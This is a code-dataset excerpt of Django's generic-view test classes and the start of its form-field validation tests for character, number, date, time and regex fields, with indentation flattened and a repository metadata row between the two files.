class AuthorCreateRestricted(AuthorCreate):
post = method_decorator(login_required)(AuthorCreate.post)
class ArtistUpdate(generic.UpdateView):
model = Artist
fields = '__all__'
class NaiveAuthorUpdate(generic.UpdateView):
queryset = Author.objects.all()
fields = '__all__'
class AuthorUpdate(generic.UpdateView):
model = Author
success_url = '/list/authors/'
fields = '__all__'
class OneAuthorUpdate(generic.UpdateView):
success_url = '/list/authors/'
fields = '__all__'
def get_object(self):
return Author.objects.get(pk=1)
class SpecializedAuthorUpdate(generic.UpdateView):
model = Author
form_class = AuthorForm
template_name = 'generic_views/form.html'
context_object_name = 'thingy'
def get_success_url(self):
return reverse('author_detail', args=[self.object.id,])
class NaiveAuthorDelete(generic.DeleteView):
queryset = Author.objects.all()
class AuthorDelete(generic.DeleteView):
model = Author
success_url = '/list/authors/'
class SpecializedAuthorDelete(generic.DeleteView):
queryset = Author.objects.all()
template_name = 'generic_views/confirm_delete.html'
context_object_name = 'thingy'
def get_success_url(self):
return reverse('authors_list')
class BookConfig(object):
queryset = Book.objects.all()
date_field = 'pubdate'
class BookArchive(BookConfig, generic.ArchiveIndexView):
pass
class BookYearArchive(BookConfig, generic.YearArchiveView):
pass
class BookMonthArchive(BookConfig, generic.MonthArchiveView):
pass
class BookWeekArchive(BookConfig, generic.WeekArchiveView):
pass
class BookDayArchive(BookConfig, generic.DayArchiveView):
pass
class BookTodayArchive(BookConfig, generic.TodayArchiveView):
pass
class BookDetail(BookConfig, generic.DateDetailView):
pass
class AuthorGetQuerySetFormView(generic.edit.ModelFormMixin):
fields = '__all__'
def get_queryset(self):
return Author.objects.all()
class BookDetailGetObjectCustomQueryset(BookDetail):
def get_object(self, queryset=None):
return super(BookDetailGetObjectCustomQueryset,self).get_object(
queryset=Book.objects.filter(pk=2))
class CustomMultipleObjectMixinView(generic.list.MultipleObjectMixin, generic.View):
queryset = [
{'name': 'John'},
{'name': 'Yoko'},
]
def get(self, request):
self.object_list = self.get_queryset()
class CustomContextView(generic.detail.SingleObjectMixin, generic.View):
model = Book
object = Book(name='dummy')
def get_object(self):
return Book(name="dummy")
def get_context_data(self, **kwargs):
context = {'custom_key': 'custom_value'}
context.update(kwargs)
return super(CustomContextView, self).get_context_data(**context)
def get_context_object_name(self, obj):
return "test_name"
class CustomSingleObjectView(generic.detail.SingleObjectMixin, generic.View):
model = Book
object = Book(name="dummy")
class BookSigningConfig(object):
model = BookSigning
date_field = 'event_date'
# use the same templates as for books
def get_template_names(self):
return ['generic_views/book%s.html' % self.template_name_suffix]
class BookSigningArchive(BookSigningConfig, generic.ArchiveIndexView):
pass
class BookSigningYearArchive(BookSigningConfig, generic.YearArchiveView):
pass
class BookSigningMonthArchive(BookSigningConfig, generic.MonthArchiveView):
pass
class BookSigningWeekArchive(BookSigningConfig, generic.WeekArchiveView):
pass
class BookSigningDayArchive(BookSigningConfig, generic.DayArchiveView):
pass
class BookSigningTodayArchive(BookSigningConfig, generic.TodayArchiveView):
pass
class BookSigningDetail(BookSigningConfig, generic.DateDetailView):
context_object_name = 'book'
class NonModel(object):
id = "non_model_1"
_meta = None
class NonModelDetail(generic.DetailView):
template_name = 'generic_views/detail.html'
model = NonModel
def get_object(self, queryset=None):
return NonModel()
|
ZhaoCJ/django
|
tests/generic_views/views.py
|
Python
|
bsd-3-clause
| 7,341
|
# -*- coding: utf-8 -*-
"""
##########
# Fields #
##########
Each Field class does some sort of validation. Each Field has a clean() method,
which either raises django.forms.ValidationError or returns the "clean"
data -- usually a Unicode object, but, in some rare cases, a list.
Each Field's __init__() takes at least these parameters:
required -- Boolean that specifies whether the field is required.
True by default.
widget -- A Widget class, or instance of a Widget class, that should be
used for this Field when displaying it. Each Field has a default
Widget that it'll use if you don't specify this. In most cases,
the default widget is TextInput.
label -- A verbose name for this field, for use in displaying this field in
a form. By default, Django will use a "pretty" version of the form
field name, if the Field is part of a Form.
initial -- A value to use in this Field's initial display. This value is
*not* used as a fallback if data isn't given.
Other than that, the Field subclasses have class-specific options for
__init__(). For example, CharField has a max_length option.
"""
from __future__ import unicode_literals
import datetime
import pickle
import re
import os
from decimal import Decimal
from django.core.files.uploadedfile import SimpleUploadedFile
from django.forms import *
from django.test import SimpleTestCase
from django.utils import formats
from django.utils import six
from django.utils import translation
from django.utils._os import upath
def fix_os_paths(x):
if isinstance(x, six.string_types):
return x.replace('\\', '/')
elif isinstance(x, tuple):
return tuple(fix_os_paths(list(x)))
elif isinstance(x, list):
return [fix_os_paths(y) for y in x]
else:
return x
class FieldsTests(SimpleTestCase):
def assertWidgetRendersTo(self, field, to):
class _Form(Form):
f = field
self.assertHTMLEqual(str(_Form()['f']), to)
def test_field_sets_widget_is_required(self):
self.assertTrue(Field(required=True).widget.is_required)
self.assertFalse(Field(required=False).widget.is_required)
def test_cooperative_multiple_inheritance(self):
class A(object):
def __init__(self):
self.class_a_var = True
super(A, self).__init__()
class ComplexField(Field, A):
def __init__(self):
super(ComplexField, self).__init__()
f = ComplexField()
self.assertTrue(f.class_a_var)
# CharField ###################################################################
def test_charfield_1(self):
f = CharField()
self.assertEqual('1', f.clean(1))
self.assertEqual('hello', f.clean('hello'))
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, None)
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, '')
self.assertEqual('[1, 2, 3]', f.clean([1, 2, 3]))
self.assertEqual(f.max_length, None)
self.assertEqual(f.min_length, None)
def test_charfield_2(self):
f = CharField(required=False)
self.assertEqual('1', f.clean(1))
self.assertEqual('hello', f.clean('hello'))
self.assertEqual('', f.clean(None))
self.assertEqual('', f.clean(''))
self.assertEqual('[1, 2, 3]', f.clean([1, 2, 3]))
self.assertEqual(f.max_length, None)
self.assertEqual(f.min_length, None)
def test_charfield_3(self):
f = CharField(max_length=10, required=False)
self.assertEqual('12345', f.clean('12345'))
self.assertEqual('1234567890', f.clean('1234567890'))
self.assertRaisesMessage(ValidationError, "'Ensure this value has at most 10 characters (it has 11).'", f.clean, '1234567890a')
self.assertEqual(f.max_length, 10)
self.assertEqual(f.min_length, None)
def test_charfield_4(self):
f = CharField(min_length=10, required=False)
self.assertEqual('', f.clean(''))
self.assertRaisesMessage(ValidationError, "'Ensure this value has at least 10 characters (it has 5).'", f.clean, '12345')
self.assertEqual('1234567890', f.clean('1234567890'))
self.assertEqual('1234567890a', f.clean('1234567890a'))
self.assertEqual(f.max_length, None)
self.assertEqual(f.min_length, 10)
def test_charfield_5(self):
f = CharField(min_length=10, required=True)
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, '')
self.assertRaisesMessage(ValidationError, "'Ensure this value has at least 10 characters (it has 5).'", f.clean, '12345')
self.assertEqual('1234567890', f.clean('1234567890'))
self.assertEqual('1234567890a', f.clean('1234567890a'))
self.assertEqual(f.max_length, None)
self.assertEqual(f.min_length, 10)
def test_charfield_length_not_int(self):
"""
Ensure that setting min_length or max_length to something that is not a
number returns an exception.
"""
self.assertRaises(ValueError, CharField, min_length='a')
self.assertRaises(ValueError, CharField, max_length='a')
self.assertRaises(ValueError, CharField, 'a')
def test_charfield_widget_attrs(self):
"""
Ensure that CharField.widget_attrs() always returns a dictionary.
Refs #15912
"""
# Return an empty dictionary if max_length is None
f = CharField()
self.assertEqual(f.widget_attrs(TextInput()), {})
# Or if the widget is not TextInput or PasswordInput
f = CharField(max_length=10)
self.assertEqual(f.widget_attrs(HiddenInput()), {})
# Otherwise, return a maxlength attribute equal to max_length
self.assertEqual(f.widget_attrs(TextInput()), {'maxlength': '10'})
self.assertEqual(f.widget_attrs(PasswordInput()), {'maxlength': '10'})
# IntegerField ################################################################
def test_integerfield_1(self):
f = IntegerField()
self.assertWidgetRendersTo(f, '<input type="number" name="f" id="id_f" />')
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, '')
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, None)
self.assertEqual(1, f.clean('1'))
self.assertEqual(True, isinstance(f.clean('1'), int))
self.assertEqual(23, f.clean('23'))
self.assertRaisesMessage(ValidationError, "'Enter a whole number.'", f.clean, 'a')
self.assertEqual(42, f.clean(42))
self.assertRaisesMessage(ValidationError, "'Enter a whole number.'", f.clean, 3.14)
self.assertEqual(1, f.clean('1 '))
self.assertEqual(1, f.clean(' 1'))
self.assertEqual(1, f.clean(' 1 '))
self.assertRaisesMessage(ValidationError, "'Enter a whole number.'", f.clean, '1a')
self.assertEqual(f.max_value, None)
self.assertEqual(f.min_value, None)
def test_integerfield_2(self):
f = IntegerField(required=False)
self.assertEqual(None, f.clean(''))
self.assertEqual('None', repr(f.clean('')))
self.assertEqual(None, f.clean(None))
self.assertEqual('None', repr(f.clean(None)))
self.assertEqual(1, f.clean('1'))
self.assertEqual(True, isinstance(f.clean('1'), int))
self.assertEqual(23, f.clean('23'))
self.assertRaisesMessage(ValidationError, "'Enter a whole number.'", f.clean, 'a')
self.assertEqual(1, f.clean('1 '))
self.assertEqual(1, f.clean(' 1'))
self.assertEqual(1, f.clean(' 1 '))
self.assertRaisesMessage(ValidationError, "'Enter a whole number.'", f.clean, '1a')
self.assertEqual(f.max_value, None)
self.assertEqual(f.min_value, None)
def test_integerfield_3(self):
f = IntegerField(max_value=10)
self.assertWidgetRendersTo(f, '<input max="10" type="number" name="f" id="id_f" />')
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, None)
self.assertEqual(1, f.clean(1))
self.assertEqual(10, f.clean(10))
self.assertRaisesMessage(ValidationError, "'Ensure this value is less than or equal to 10.'", f.clean, 11)
self.assertEqual(10, f.clean('10'))
self.assertRaisesMessage(ValidationError, "'Ensure this value is less than or equal to 10.'", f.clean, '11')
self.assertEqual(f.max_value, 10)
self.assertEqual(f.min_value, None)
def test_integerfield_4(self):
f = IntegerField(min_value=10)
self.assertWidgetRendersTo(f, '<input id="id_f" type="number" name="f" min="10" />')
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, None)
self.assertRaisesMessage(ValidationError, "'Ensure this value is greater than or equal to 10.'", f.clean, 1)
self.assertEqual(10, f.clean(10))
self.assertEqual(11, f.clean(11))
self.assertEqual(10, f.clean('10'))
self.assertEqual(11, f.clean('11'))
self.assertEqual(f.max_value, None)
self.assertEqual(f.min_value, 10)
def test_integerfield_5(self):
f = IntegerField(min_value=10, max_value=20)
self.assertWidgetRendersTo(f, '<input id="id_f" max="20" type="number" name="f" min="10" />')
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, None)
self.assertRaisesMessage(ValidationError, "'Ensure this value is greater than or equal to 10.'", f.clean, 1)
self.assertEqual(10, f.clean(10))
self.assertEqual(11, f.clean(11))
self.assertEqual(10, f.clean('10'))
self.assertEqual(11, f.clean('11'))
self.assertEqual(20, f.clean(20))
self.assertRaisesMessage(ValidationError, "'Ensure this value is less than or equal to 20.'", f.clean, 21)
self.assertEqual(f.max_value, 20)
self.assertEqual(f.min_value, 10)
def test_integerfield_localized(self):
"""
Make sure localized IntegerField's widget renders to a text input with
no number input specific attributes.
"""
f1 = IntegerField(localize=True)
self.assertWidgetRendersTo(f1, '<input id="id_f" name="f" type="text" />')
# FloatField ##################################################################
def test_floatfield_1(self):
f = FloatField()
self.assertWidgetRendersTo(f, '<input step="any" type="number" name="f" id="id_f" />')
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, '')
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, None)
self.assertEqual(1.0, f.clean('1'))
self.assertEqual(True, isinstance(f.clean('1'), float))
self.assertEqual(23.0, f.clean('23'))
self.assertEqual(3.1400000000000001, f.clean('3.14'))
self.assertEqual(3.1400000000000001, f.clean(3.14))
self.assertEqual(42.0, f.clean(42))
self.assertRaisesMessage(ValidationError, "'Enter a number.'", f.clean, 'a')
self.assertEqual(1.0, f.clean('1.0 '))
self.assertEqual(1.0, f.clean(' 1.0'))
self.assertEqual(1.0, f.clean(' 1.0 '))
self.assertRaisesMessage(ValidationError, "'Enter a number.'", f.clean, '1.0a')
self.assertEqual(f.max_value, None)
self.assertEqual(f.min_value, None)
def test_floatfield_2(self):
f = FloatField(required=False)
self.assertEqual(None, f.clean(''))
self.assertEqual(None, f.clean(None))
self.assertEqual(1.0, f.clean('1'))
self.assertEqual(f.max_value, None)
self.assertEqual(f.min_value, None)
def test_floatfield_3(self):
f = FloatField(max_value=1.5, min_value=0.5)
self.assertWidgetRendersTo(f, '<input step="any" name="f" min="0.5" max="1.5" type="number" id="id_f" />')
self.assertRaisesMessage(ValidationError, "'Ensure this value is less than or equal to 1.5.'", f.clean, '1.6')
self.assertRaisesMessage(ValidationError, "'Ensure this value is greater than or equal to 0.5.'", f.clean, '0.4')
self.assertEqual(1.5, f.clean('1.5'))
self.assertEqual(0.5, f.clean('0.5'))
self.assertEqual(f.max_value, 1.5)
self.assertEqual(f.min_value, 0.5)
def test_floatfield_localized(self):
"""
Make sure localized FloatField's widget renders to a text input with
no number input specific attributes.
"""
f = FloatField(localize=True)
self.assertWidgetRendersTo(f, '<input id="id_f" name="f" type="text" />')
def test_floatfield_changed(self):
f = FloatField()
n = 4.35
self.assertFalse(f._has_changed(n, '4.3500'))
with translation.override('fr'):
with self.settings(USE_L10N=True):
f = FloatField(localize=True)
localized_n = formats.localize_input(n) # -> '4,35' in French
self.assertFalse(f._has_changed(n, localized_n))
# DecimalField ################################################################
def test_decimalfield_1(self):
f = DecimalField(max_digits=4, decimal_places=2)
self.assertWidgetRendersTo(f, '<input id="id_f" step="0.01" type="number" name="f" />')
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, '')
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, None)
self.assertEqual(f.clean('1'), Decimal("1"))
self.assertEqual(True, isinstance(f.clean('1'), Decimal))
self.assertEqual(f.clean('23'), Decimal("23"))
self.assertEqual(f.clean('3.14'), Decimal("3.14"))
self.assertEqual(f.clean(3.14), Decimal("3.14"))
self.assertEqual(f.clean(Decimal('3.14')), Decimal("3.14"))
self.assertRaisesMessage(ValidationError, "'Enter a number.'", f.clean, 'NaN')
self.assertRaisesMessage(ValidationError, "'Enter a number.'", f.clean, 'Inf')
self.assertRaisesMessage(ValidationError, "'Enter a number.'", f.clean, '-Inf')
self.assertRaisesMessage(ValidationError, "'Enter a number.'", f.clean, 'a')
self.assertRaisesMessage(ValidationError, "'Enter a number.'", f.clean, 'łąść')
self.assertEqual(f.clean('1.0 '), Decimal("1.0"))
self.assertEqual(f.clean(' 1.0'), Decimal("1.0"))
self.assertEqual(f.clean(' 1.0 '), Decimal("1.0"))
self.assertRaisesMessage(ValidationError, "'Enter a number.'", f.clean, '1.0a')
self.assertRaisesMessage(ValidationError, "'Ensure that there are no more than 4 digits in total.'", f.clean, '123.45')
self.assertRaisesMessage(ValidationError, "'Ensure that there are no more than 2 decimal places.'", f.clean, '1.234')
self.assertRaisesMessage(ValidationError, "'Ensure that there are no more than 2 digits before the decimal point.'", f.clean, '123.4')
self.assertEqual(f.clean('-12.34'), Decimal("-12.34"))
self.assertRaisesMessage(ValidationError, "'Ensure that there are no more than 4 digits in total.'", f.clean, '-123.45')
self.assertEqual(f.clean('-.12'), Decimal("-0.12"))
self.assertEqual(f.clean('-00.12'), Decimal("-0.12"))
self.assertEqual(f.clean('-000.12'), Decimal("-0.12"))
self.assertRaisesMessage(ValidationError, "'Ensure that there are no more than 2 decimal places.'", f.clean, '-000.123')
self.assertRaisesMessage(ValidationError, "'Ensure that there are no more than 4 digits in total.'", f.clean, '-000.12345')
self.assertRaisesMessage(ValidationError, "'Enter a number.'", f.clean, '--0.12')
self.assertEqual(f.max_digits, 4)
self.assertEqual(f.decimal_places, 2)
self.assertEqual(f.max_value, None)
self.assertEqual(f.min_value, None)
def test_decimalfield_2(self):
f = DecimalField(max_digits=4, decimal_places=2, required=False)
self.assertEqual(None, f.clean(''))
self.assertEqual(None, f.clean(None))
self.assertEqual(f.clean('1'), Decimal("1"))
self.assertEqual(f.max_digits, 4)
self.assertEqual(f.decimal_places, 2)
self.assertEqual(f.max_value, None)
self.assertEqual(f.min_value, None)
def test_decimalfield_3(self):
f = DecimalField(max_digits=4, decimal_places=2, max_value=Decimal('1.5'), min_value=Decimal('0.5'))
self.assertWidgetRendersTo(f, '<input step="0.01" name="f" min="0.5" max="1.5" type="number" id="id_f" />')
self.assertRaisesMessage(ValidationError, "'Ensure this value is less than or equal to 1.5.'", f.clean, '1.6')
self.assertRaisesMessage(ValidationError, "'Ensure this value is greater than or equal to 0.5.'", f.clean, '0.4')
self.assertEqual(f.clean('1.5'), Decimal("1.5"))
self.assertEqual(f.clean('0.5'), Decimal("0.5"))
self.assertEqual(f.clean('.5'), Decimal("0.5"))
self.assertEqual(f.clean('00.50'), Decimal("0.50"))
self.assertEqual(f.max_digits, 4)
self.assertEqual(f.decimal_places, 2)
self.assertEqual(f.max_value, Decimal('1.5'))
self.assertEqual(f.min_value, Decimal('0.5'))
def test_decimalfield_4(self):
f = DecimalField(decimal_places=2)
self.assertRaisesMessage(ValidationError, "'Ensure that there are no more than 2 decimal places.'", f.clean, '0.00000001')
def test_decimalfield_5(self):
f = DecimalField(max_digits=3)
# Leading whole zeros "collapse" to one digit.
self.assertEqual(f.clean('0000000.10'), Decimal("0.1"))
# But a leading 0 before the . doesn't count towards max_digits
self.assertEqual(f.clean('0000000.100'), Decimal("0.100"))
# Only leading whole zeros "collapse" to one digit.
self.assertEqual(f.clean('000000.02'), Decimal('0.02'))
self.assertRaisesMessage(ValidationError, "'Ensure that there are no more than 3 digits in total.'", f.clean, '000000.0002')
self.assertEqual(f.clean('.002'), Decimal("0.002"))
def test_decimalfield_6(self):
f = DecimalField(max_digits=2, decimal_places=2)
self.assertEqual(f.clean('.01'), Decimal(".01"))
self.assertRaisesMessage(ValidationError, "'Ensure that there are no more than 0 digits before the decimal point.'", f.clean, '1.1')
def test_decimalfield_widget_attrs(self):
f = DecimalField(max_digits=6, decimal_places=2)
self.assertEqual(f.widget_attrs(Widget()), {})
self.assertEqual(f.widget_attrs(NumberInput()), {'step': '0.01'})
f = DecimalField(max_digits=10, decimal_places=0)
self.assertEqual(f.widget_attrs(NumberInput()), {'step': '1'})
f = DecimalField(max_digits=19, decimal_places=19)
self.assertEqual(f.widget_attrs(NumberInput()), {'step': '1e-19'})
f = DecimalField(max_digits=20)
self.assertEqual(f.widget_attrs(NumberInput()), {'step': 'any'})
def test_decimalfield_localized(self):
"""
Make sure localized DecimalField's widget renders to a text input with
no number input specific attributes.
"""
f = DecimalField(localize=True)
self.assertWidgetRendersTo(f, '<input id="id_f" name="f" type="text" />')
def test_decimalfield_changed(self):
f = DecimalField(max_digits=2, decimal_places=2)
d = Decimal("0.1")
self.assertFalse(f._has_changed(d, '0.10'))
self.assertTrue(f._has_changed(d, '0.101'))
with translation.override('fr'):
with self.settings(USE_L10N=True):
f = DecimalField(max_digits=2, decimal_places=2, localize=True)
localized_d = formats.localize_input(d) # -> '0,1' in French
self.assertFalse(f._has_changed(d, localized_d))
# DateField ###################################################################
def test_datefield_1(self):
f = DateField()
self.assertEqual(datetime.date(2006, 10, 25), f.clean(datetime.date(2006, 10, 25)))
self.assertEqual(datetime.date(2006, 10, 25), f.clean(datetime.datetime(2006, 10, 25, 14, 30)))
self.assertEqual(datetime.date(2006, 10, 25), f.clean(datetime.datetime(2006, 10, 25, 14, 30, 59)))
self.assertEqual(datetime.date(2006, 10, 25), f.clean(datetime.datetime(2006, 10, 25, 14, 30, 59, 200)))
self.assertEqual(datetime.date(2006, 10, 25), f.clean('2006-10-25'))
self.assertEqual(datetime.date(2006, 10, 25), f.clean('10/25/2006'))
self.assertEqual(datetime.date(2006, 10, 25), f.clean('10/25/06'))
self.assertEqual(datetime.date(2006, 10, 25), f.clean('Oct 25 2006'))
self.assertEqual(datetime.date(2006, 10, 25), f.clean('October 25 2006'))
self.assertEqual(datetime.date(2006, 10, 25), f.clean('October 25, 2006'))
self.assertEqual(datetime.date(2006, 10, 25), f.clean('25 October 2006'))
self.assertEqual(datetime.date(2006, 10, 25), f.clean('25 October, 2006'))
self.assertRaisesMessage(ValidationError, "'Enter a valid date.'", f.clean, '2006-4-31')
self.assertRaisesMessage(ValidationError, "'Enter a valid date.'", f.clean, '200a-10-25')
self.assertRaisesMessage(ValidationError, "'Enter a valid date.'", f.clean, '25/10/06')
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, None)
def test_datefield_2(self):
f = DateField(required=False)
self.assertEqual(None, f.clean(None))
self.assertEqual('None', repr(f.clean(None)))
self.assertEqual(None, f.clean(''))
self.assertEqual('None', repr(f.clean('')))
def test_datefield_3(self):
f = DateField(input_formats=['%Y %m %d'])
self.assertEqual(datetime.date(2006, 10, 25), f.clean(datetime.date(2006, 10, 25)))
self.assertEqual(datetime.date(2006, 10, 25), f.clean(datetime.datetime(2006, 10, 25, 14, 30)))
self.assertEqual(datetime.date(2006, 10, 25), f.clean('2006 10 25'))
self.assertRaisesMessage(ValidationError, "'Enter a valid date.'", f.clean, '2006-10-25')
self.assertRaisesMessage(ValidationError, "'Enter a valid date.'", f.clean, '10/25/2006')
self.assertRaisesMessage(ValidationError, "'Enter a valid date.'", f.clean, '10/25/06')
def test_datefield_4(self):
# Test whitespace stripping behavior (#5714)
f = DateField()
self.assertEqual(datetime.date(2006, 10, 25), f.clean(' 10/25/2006 '))
self.assertEqual(datetime.date(2006, 10, 25), f.clean(' 10/25/06 '))
self.assertEqual(datetime.date(2006, 10, 25), f.clean(' Oct 25 2006 '))
self.assertEqual(datetime.date(2006, 10, 25), f.clean(' October 25 2006 '))
self.assertEqual(datetime.date(2006, 10, 25), f.clean(' October 25, 2006 '))
self.assertEqual(datetime.date(2006, 10, 25), f.clean(' 25 October 2006 '))
self.assertRaisesMessage(ValidationError, "'Enter a valid date.'", f.clean, ' ')
def test_datefield_5(self):
# Test null bytes (#18982)
f = DateField()
self.assertRaisesMessage(ValidationError, "'Enter a valid date.'", f.clean, 'a\x00b')
def test_datefield_changed(self):
format = '%d/%m/%Y'
f = DateField(input_formats=[format])
d = datetime.date(2007, 9, 17)
self.assertFalse(f._has_changed(d, '17/09/2007'))
def test_datefield_strptime(self):
"""Test that field.strptime doesn't raise an UnicodeEncodeError (#16123)"""
f = DateField()
try:
f.strptime('31 мая 2011', '%d-%b-%y')
except Exception as e:
# assertIsInstance or assertRaises cannot be used because UnicodeEncodeError
# is a subclass of ValueError
self.assertEqual(e.__class__, ValueError)
# TimeField ###################################################################
def test_timefield_1(self):
f = TimeField()
self.assertEqual(datetime.time(14, 25), f.clean(datetime.time(14, 25)))
self.assertEqual(datetime.time(14, 25, 59), f.clean(datetime.time(14, 25, 59)))
self.assertEqual(datetime.time(14, 25), f.clean('14:25'))
self.assertEqual(datetime.time(14, 25, 59), f.clean('14:25:59'))
self.assertRaisesMessage(ValidationError, "'Enter a valid time.'", f.clean, 'hello')
self.assertRaisesMessage(ValidationError, "'Enter a valid time.'", f.clean, '1:24 p.m.')
def test_timefield_2(self):
f = TimeField(input_formats=['%I:%M %p'])
self.assertEqual(datetime.time(14, 25), f.clean(datetime.time(14, 25)))
self.assertEqual(datetime.time(14, 25, 59), f.clean(datetime.time(14, 25, 59)))
self.assertEqual(datetime.time(4, 25), f.clean('4:25 AM'))
self.assertEqual(datetime.time(16, 25), f.clean('4:25 PM'))
self.assertRaisesMessage(ValidationError, "'Enter a valid time.'", f.clean, '14:30:45')
def test_timefield_3(self):
f = TimeField()
# Test whitespace stripping behavior (#5714)
self.assertEqual(datetime.time(14, 25), f.clean(' 14:25 '))
self.assertEqual(datetime.time(14, 25, 59), f.clean(' 14:25:59 '))
self.assertRaisesMessage(ValidationError, "'Enter a valid time.'", f.clean, ' ')
def test_timefield_changed(self):
t1 = datetime.time(12, 51, 34, 482548)
t2 = datetime.time(12, 51)
f = TimeField(input_formats=['%H:%M', '%H:%M %p'])
self.assertTrue(f._has_changed(t1, '12:51'))
self.assertFalse(f._has_changed(t2, '12:51'))
self.assertFalse(f._has_changed(t2, '12:51 PM'))
# DateTimeField ###############################################################
def test_datetimefield_1(self):
f = DateTimeField()
self.assertEqual(datetime.datetime(2006, 10, 25, 0, 0), f.clean(datetime.date(2006, 10, 25)))
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30), f.clean(datetime.datetime(2006, 10, 25, 14, 30)))
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30, 59), f.clean(datetime.datetime(2006, 10, 25, 14, 30, 59)))
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30, 59, 200), f.clean(datetime.datetime(2006, 10, 25, 14, 30, 59, 200)))
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30, 45, 200), f.clean('2006-10-25 14:30:45.000200'))
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30, 45, 200), f.clean('2006-10-25 14:30:45.0002'))
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30, 45), f.clean('2006-10-25 14:30:45'))
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30), f.clean('2006-10-25 14:30:00'))
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30), f.clean('2006-10-25 14:30'))
self.assertEqual(datetime.datetime(2006, 10, 25, 0, 0), f.clean('2006-10-25'))
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30, 45, 200), f.clean('10/25/2006 14:30:45.000200'))
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30, 45), f.clean('10/25/2006 14:30:45'))
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30), f.clean('10/25/2006 14:30:00'))
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30), f.clean('10/25/2006 14:30'))
self.assertEqual(datetime.datetime(2006, 10, 25, 0, 0), f.clean('10/25/2006'))
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30, 45, 200), f.clean('10/25/06 14:30:45.000200'))
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30, 45), f.clean('10/25/06 14:30:45'))
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30), f.clean('10/25/06 14:30:00'))
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30), f.clean('10/25/06 14:30'))
self.assertEqual(datetime.datetime(2006, 10, 25, 0, 0), f.clean('10/25/06'))
self.assertRaisesMessage(ValidationError, "'Enter a valid date/time.'", f.clean, 'hello')
self.assertRaisesMessage(ValidationError, "'Enter a valid date/time.'", f.clean, '2006-10-25 4:30 p.m.')
def test_datetimefield_2(self):
f = DateTimeField(input_formats=['%Y %m %d %I:%M %p'])
self.assertEqual(datetime.datetime(2006, 10, 25, 0, 0), f.clean(datetime.date(2006, 10, 25)))
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30), f.clean(datetime.datetime(2006, 10, 25, 14, 30)))
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30, 59), f.clean(datetime.datetime(2006, 10, 25, 14, 30, 59)))
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30, 59, 200), f.clean(datetime.datetime(2006, 10, 25, 14, 30, 59, 200)))
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30), f.clean('2006 10 25 2:30 PM'))
self.assertRaisesMessage(ValidationError, "'Enter a valid date/time.'", f.clean, '2006-10-25 14:30:45')
def test_datetimefield_3(self):
f = DateTimeField(required=False)
self.assertEqual(None, f.clean(None))
self.assertEqual('None', repr(f.clean(None)))
self.assertEqual(None, f.clean(''))
self.assertEqual('None', repr(f.clean('')))
def test_datetimefield_4(self):
f = DateTimeField()
# Test whitespace stripping behavior (#5714)
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30, 45), f.clean(' 2006-10-25 14:30:45 '))
self.assertEqual(datetime.datetime(2006, 10, 25, 0, 0), f.clean(' 2006-10-25 '))
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30, 45), f.clean(' 10/25/2006 14:30:45 '))
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30), f.clean(' 10/25/2006 14:30 '))
self.assertEqual(datetime.datetime(2006, 10, 25, 0, 0), f.clean(' 10/25/2006 '))
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30, 45), f.clean(' 10/25/06 14:30:45 '))
self.assertEqual(datetime.datetime(2006, 10, 25, 0, 0), f.clean(' 10/25/06 '))
self.assertRaisesMessage(ValidationError, "'Enter a valid date/time.'", f.clean, ' ')
def test_datetimefield_5(self):
f = DateTimeField(input_formats=['%Y.%m.%d %H:%M:%S.%f'])
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30, 45, 200), f.clean('2006.10.25 14:30:45.0002'))
def test_datetimefield_changed(self):
format = '%Y %m %d %I:%M %p'
f = DateTimeField(input_formats=[format])
d = datetime.datetime(2006, 9, 17, 14, 30, 0)
self.assertFalse(f._has_changed(d, '2006 09 17 2:30 PM'))
# RegexField ##################################################################
def test_regexfield_1(self):
f = RegexField('^\d[A-F]\d$')
self.assertEqual('2A2', f.clean('2A2'))
self.assertEqual('3F3', f.clean('3F3'))
self.assertRaisesMessage(ValidationError, "'Enter a valid value.'", f.clean, '3G3')
self.assertRaisesMessage(ValidationError, "'Enter a valid value.'", f.clean, ' 2A2')
self.assertRaisesMessage(ValidationError, "'Enter a valid value.'", f.clean, '2A2 ')
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, '')
def test_regexfield_2(self):
f = RegexField('^\d[A-F]\d$', required=False)
self.assertEqual('2A2', f.clean('2A2'))
self.assertEqual('3F3', f.clean('3F3'))
self.assertRaisesMessage(ValidationError, "'Enter a valid value.'", f.clean, '3G3')
self.assertEqual('', f.clean(''))
def test_regexfield_3(self):
f = RegexField(re.compile('^\d[A-F]\d$'))
self.assertEqual('2A2', f.clean('2A2'))
